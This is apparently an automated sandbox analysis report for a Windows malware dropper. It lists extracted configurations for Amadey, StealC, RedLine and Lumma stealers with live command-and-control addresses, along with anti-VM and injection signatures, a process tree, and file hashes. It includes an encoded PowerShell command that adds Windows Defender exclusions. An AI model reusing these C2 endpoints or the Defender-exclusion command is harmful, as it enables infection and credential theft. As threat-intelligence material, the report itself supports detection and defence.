Analysis
-
max time kernel
300s -
max time network
293s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
01-07-2024 05:07
Static task
static1
Behavioral task
behavioral1
Sample
bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
Resource
win7-20240508-en
General
-
Target
bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
-
Size
1.9MB
-
MD5
eaa443f37443cb7221d63e0891243384
-
SHA1
d3242326b2ac1ae6e9817a49df33c3a79e209aee
-
SHA256
bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13
-
SHA512
8405c44c1eea8578224eb6495f689d66e4e2f6503c0bf08d3c111e4e307603a35089649296ebf89b76d339c9517a83133b741c655097a9fe319f25aae1f6afdb
-
SSDEEP
49152:6YyPZ96v5ohNyPiYPl5A7E2+P75+Zg6RenX1IAhTiz8wPT:kBSPiYNK7mP91/TOQ
Malware Config
Extracted
amadey
8254624243
e76b71
http://77.91.77.81
-
install_dir
8254624243
-
install_file
axplong.exe
-
strings_key
90049e51fabf09df0d6748e0b271922e
-
url_paths
/Kiru9gu/index.php
Extracted
stealc
jopa
http://65.21.175.0
-
url_path
/108e010e8f91c38c.php
Extracted
redline
LiveTraffoc
4.185.56.82:42687
Extracted
redline
newlogs
85.28.47.7:17210
Extracted
stealc
ZOV
http://40.86.87.10
-
url_path
/108e010e8f91c38c.php
Extracted
redline
newbuild
185.215.113.67:40960
Extracted
lumma
https://groundsmooors.shop/api
https://potterryisiw.shop/api
https://foodypannyjsud.shop/api
https://contintnetksows.shop/api
https://reinforcedirectorywd.shop/api
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/3356-127-0x0000000000400000-0x0000000000450000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe family_redline behavioral2/memory/4272-148-0x0000000000AE0000-0x0000000000B30000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe family_redline behavioral2/memory/4908-198-0x00000000004E0000-0x0000000000530000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
Processes:
axplong.exebef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe -
Executes dropped EXE 22 IoCs
Processes:
axplong.exestreamer.exeTpWWMUpe0LEV.exeFreshbuild.execrypt6.exeHkbsse.exenewlogs.exestealc_zov.exe1.exenewbuild.exerealtekdriver.exeHkbsse.exeaxplong.exerealtekdriver.exeHkbsse.exeaxplong.exeaxplong.exeHkbsse.exeHkbsse.exeaxplong.exeaxplong.exeHkbsse.exepid process 4036 axplong.exe 1756 streamer.exe 2244 TpWWMUpe0LEV.exe 4400 Freshbuild.exe 2288 crypt6.exe 4976 Hkbsse.exe 4272 newlogs.exe 4408 stealc_zov.exe 4088 1.exe 4908 newbuild.exe 4668 realtekdriver.exe 5364 Hkbsse.exe 6064 axplong.exe 5852 realtekdriver.exe 1688 Hkbsse.exe 64 axplong.exe 5928 axplong.exe 5244 Hkbsse.exe 816 Hkbsse.exe 1628 axplong.exe 5776 axplong.exe 5820 Hkbsse.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe Key opened \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine axplong.exe -
Loads dropped DLL 1 IoCs
Processes:
TpWWMUpe0LEV.exepid process 2244 TpWWMUpe0LEV.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
realtekdriver.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\ScannerService = "C:\\Users\\Admin\\AppData\\Roaming\\ScannerService.exe" realtekdriver.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exepid process 2272 bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe 4036 axplong.exe 6064 axplong.exe 64 axplong.exe 5928 axplong.exe 1628 axplong.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
TpWWMUpe0LEV.execrypt6.exestreamer.exerealtekdriver.exedescription pid process target process PID 2244 set thread context of 924 2244 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 2288 set thread context of 3356 2288 crypt6.exe RegAsm.exe PID 1756 set thread context of 1688 1756 streamer.exe BitLockerToGo.exe PID 4668 set thread context of 5852 4668 realtekdriver.exe realtekdriver.exe -
Drops file in Windows directory 3 IoCs
Processes:
bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeFreshbuild.exerealtekdriver.exedescription ioc process File created C:\Windows\Tasks\axplong.job bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe File created C:\Windows\Tasks\Hkbsse.job Freshbuild.exe File created C:\Windows\Tasks\Test Task17.job realtekdriver.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1224 2288 WerFault.exe crypt6.exe 220 4088 WerFault.exe 1.exe 5624 924 WerFault.exe aspnet_regiis.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
aspnet_regiis.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 aspnet_regiis.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString aspnet_regiis.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeRegAsm.exeaxplong.exepowershell.exeaspnet_regiis.exeaxplong.exeaxplong.exeaxplong.exepid process 2272 bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe 2272 bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe 4036 axplong.exe 4036 axplong.exe 3356 RegAsm.exe 3356 RegAsm.exe 3356 RegAsm.exe 3356 RegAsm.exe 6064 axplong.exe 6064 axplong.exe 5708 powershell.exe 5708 powershell.exe 5708 powershell.exe 924 aspnet_regiis.exe 924 aspnet_regiis.exe 64 axplong.exe 64 axplong.exe 5928 axplong.exe 5928 axplong.exe 1628 axplong.exe 1628 axplong.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
realtekdriver.exeRegAsm.exepowershell.exedescription pid process Token: SeDebugPrivilege 4668 realtekdriver.exe Token: SeDebugPrivilege 3356 RegAsm.exe Token: SeDebugPrivilege 4668 realtekdriver.exe Token: SeDebugPrivilege 5708 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeTpWWMUpe0LEV.exeFreshbuild.execrypt6.exeHkbsse.exestreamer.exedescription pid process target process PID 2272 wrote to memory of 4036 2272 bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe axplong.exe PID 2272 wrote to memory of 4036 2272 bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe axplong.exe PID 2272 wrote to memory of 4036 2272 bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe axplong.exe PID 4036 wrote to memory of 1756 4036 axplong.exe streamer.exe PID 4036 wrote to memory of 1756 4036 axplong.exe streamer.exe PID 4036 wrote to memory of 2244 4036 axplong.exe TpWWMUpe0LEV.exe PID 4036 wrote to memory of 2244 4036 axplong.exe TpWWMUpe0LEV.exe PID 4036 wrote to memory of 2244 4036 axplong.exe TpWWMUpe0LEV.exe PID 2244 wrote to memory of 924 2244 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 2244 wrote to memory of 924 2244 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 2244 wrote to memory of 924 2244 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 2244 wrote to memory of 924 2244 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 2244 wrote to memory of 924 2244 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 2244 wrote to memory of 924 2244 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 2244 wrote to memory of 924 2244 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 2244 wrote to memory of 924 2244 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 2244 wrote to memory of 924 2244 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 4036 wrote to memory of 4400 4036 axplong.exe Freshbuild.exe PID 4036 wrote to memory of 4400 4036 axplong.exe Freshbuild.exe PID 4036 wrote to memory of 4400 4036 axplong.exe Freshbuild.exe PID 4036 wrote to memory of 2288 4036 axplong.exe crypt6.exe PID 4036 wrote to memory of 2288 4036 axplong.exe crypt6.exe PID 4036 wrote to memory of 2288 4036 axplong.exe crypt6.exe PID 4400 wrote to memory of 4976 4400 Freshbuild.exe Hkbsse.exe PID 4400 wrote to memory of 4976 4400 Freshbuild.exe Hkbsse.exe PID 4400 wrote to memory of 4976 4400 Freshbuild.exe Hkbsse.exe PID 2288 wrote to memory of 3092 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3092 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3092 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3368 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3368 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3368 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 4208 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 4208 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 4208 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 5100 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 5100 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 5100 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3356 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3356 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3356 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3356 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3356 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3356 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3356 2288 crypt6.exe RegAsm.exe PID 2288 wrote to memory of 3356 2288 crypt6.exe RegAsm.exe PID 4036 wrote to memory of 4272 4036 axplong.exe newlogs.exe PID 4036 wrote to memory of 4272 4036 axplong.exe newlogs.exe PID 4036 wrote to memory of 4272 4036 axplong.exe newlogs.exe PID 4036 wrote to memory of 4408 4036 axplong.exe stealc_zov.exe PID 4036 wrote to memory of 4408 4036 axplong.exe stealc_zov.exe PID 4036 wrote to memory of 4408 4036 axplong.exe stealc_zov.exe PID 4976 wrote to memory of 4088 4976 Hkbsse.exe 1.exe PID 4976 wrote to memory of 4088 4976 Hkbsse.exe 1.exe PID 4976 wrote to memory of 4088 4976 Hkbsse.exe 1.exe PID 4036 wrote to memory of 4908 4036 axplong.exe newbuild.exe PID 4036 wrote to memory of 4908 4036 axplong.exe newbuild.exe PID 4036 wrote to memory of 4908 4036 axplong.exe newbuild.exe PID 4036 wrote to memory of 4668 4036 axplong.exe realtekdriver.exe PID 4036 wrote to memory of 4668 4036 axplong.exe realtekdriver.exe PID 4036 wrote to memory of 4668 4036 axplong.exe realtekdriver.exe PID 1756 wrote to memory of 1688 1756 streamer.exe BitLockerToGo.exe PID 1756 wrote to memory of 1688 1756 streamer.exe BitLockerToGo.exe PID 1756 wrote to memory of 1688 1756 streamer.exe BitLockerToGo.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe"C:\Users\Admin\AppData\Local\Temp\bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe"C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"4⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 924 -s 11165⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exe"C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000028001\1.exe"C:\Users\Admin\AppData\Local\Temp\1000028001\1.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 5046⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe"C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 3524⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe"C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe"C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe"C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe"C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAAxADMANQAwADAAMQBcAHIAZQBhAGwAdABlAGsAZAByAGkAdgBlAHIALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAHIAZQBhAGwAdABlAGsAZAByAGkAdgBlAHIALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFMAYwBhAG4AbgBlAHIAUwBlAHIAdgBpAGMAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAUwBjAGEAbgBuAGUAcgBTAGUAcgB2AGkAYwBlAC4AZQB4AGUA4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe"C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\1000028001\1.exeFilesize
240KB
MD5b5b04a1ea6d55d9b62d90de0d89a0199
SHA1567cb7d6182173e4a00356bd7d770c2625cfc0f5
SHA2565c14b695450b36c84924c067f8e38374ca05d814293d26ca2e0d0ac02ec4eaa8
SHA512d398d441e71bf1176a12e8834674d3c19e95c29824ffc718acb4bc114d7318b7bc6d859dd60710062150142afa4336acd8fbb5c5a600465c4799b833cc9bacef
-
C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exeFilesize
6.2MB
MD5b9265c31743db2e9698a08df7b0c5e9d
SHA1aa01367b13f827a5773d0781692809ae175bc718
SHA256b2a10d42ed9b902a6a4a40b47da8448c9fa61f268f3ffb37d08bd5f5e213a0af
SHA5121678d62ad17ce27394599f2835f3c1f209f544fdfae4c54034e7da06936768fe487a55811d9f0919018113af50153437ea0631968814910db69df0ffda36a133
-
C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exeFilesize
1.2MB
MD5242214131486132e33ceda794d66ca1f
SHA14ce34fd91f5c9e35b8694007b286635663ef9bf2
SHA256bac402b5749b2da2211db6d2404c1c621ccd0c2e5d492eb6f973b3e2d38dd361
SHA512031e0904d949cec515f2d6f2b5e4b9c0df03637787ff14f20c58e711c54eec77d1f22aa0cf0f6efd65362c1fc0066645d5d005c6a77fe5b169427cdd42555d29
-
C:\Users\Admin\AppData\Local\Temp\1000115001\build.exeFilesize
26KB
MD5b7d2c1f174eefb2691c5e9e54646bcf8
SHA1a1426c9956551085b76f8480efa9213c1f445e25
SHA256d945daff39e54640dba27324fa0472c25e1a0ca8bffdf4b31c499aa3bc88a1e2
SHA512ca7616c052d72b4e1a750ce2996f7c5ce49193307d83e3aeab30c996306c90d7127cde9c4c7ce1151a01f32aff02bac45a90b218ae5b1b783e5b4b1e347ac32d
-
C:\Users\Admin\AppData\Local\Temp\1000116001\FILE1.exeFilesize
26KB
MD5a8bc178b9c6b03fbdea6d742e11ea3ae
SHA16090087f5a820a2b269b780482a00bd63edbce68
SHA256248ce8ab3da7891872b69e45c61c6cb563f0b7598089e4a3e09f0b70be38418f
SHA512a5345fd8c8446f60703baa6348311fb35a9d98b11fad5f39ba5142362d2e44a7ab4bd34834ebdf12d7d3eeb92cb425df717387612cd2ae005f13598cb1d02840
-
C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exeFilesize
415KB
MD507101cac5b9477ba636cd8ca7b9932cb
SHA159ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1
SHA256488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77
SHA51202240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887
-
C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exeFilesize
512KB
MD5a957dc16d684fbd7e12fc87e8ee12fea
SHA120c73ccfdba13fd9b79c9e02432be39e48e4b37d
SHA256071b6c448d2546dea8caed872fca0d002f59a6b9849f0de2a565fc74b487fa37
SHA512fd6982587fba779d6febb84dfa65ec3e048e17733c2f01b61996bedb170bb4bb1cbb822c0dd2cf44a7e601373abaf499885b13b7957dd2a307bbd8f2120e9b3b
-
C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exeFilesize
297KB
MD50970456d2e2bcb36f49d23f5f2eec4ce
SHA11e427bbeb209b636371d17801b14fabff87921be
SHA256264db4d677606c95912a93a457675d5ebaa24dc886da8bbcb800fe831c540a54
SHA51243c233e6c6fb20ee5830672f68eec2a1930aff6c3da185b7af56ede90970041157755b8893a86336711c8ba8cbe3f22818de8ddc1789ed65a7aacd596771909e
-
C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exeFilesize
158KB
MD5253ccac8a47b80287f651987c0c779ea
SHA111db405849dbaa9b3759de921835df20fab35bc3
SHA256262a400b339deea5089433709ce559d23253e23d23c07595b515755114147e2f
SHA512af40e01bc3d36baf47eba1d5d6406220dfbcc52c6123dd8450e709fed3e72bed82aac6257fa7bdf7dd774f182919a5051e9712b2e7f1329defd0b159cb08385d
-
C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exeFilesize
297KB
MD59ab4de8b2f2b99f009d32aa790cd091b
